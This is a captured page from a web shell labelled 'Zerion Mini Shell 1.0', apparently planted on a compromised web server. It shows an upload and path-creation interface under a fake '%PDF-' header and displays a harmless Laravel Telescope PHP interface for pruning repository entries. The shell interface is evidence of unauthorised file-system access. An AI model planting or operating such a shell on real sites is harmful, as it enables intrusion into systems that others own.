%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/pjcold2/vendor/laravel/telescope/src/Contracts/
Upload File :
Create Path :
Current File : //var/www/pjcold2/vendor/laravel/telescope/src/Contracts/PrunableRepository.php

<?php

namespace Laravel\Telescope\Contracts;

use DateTimeInterface;

interface PrunableRepository
{
    /**
     * Prune all of the entries older than the given date.
     *
     * @param  \DateTimeInterface  $before
     * @return void
     */
    public function prune(DateTimeInterface $before);
}

Zerion Mini Shell 1.0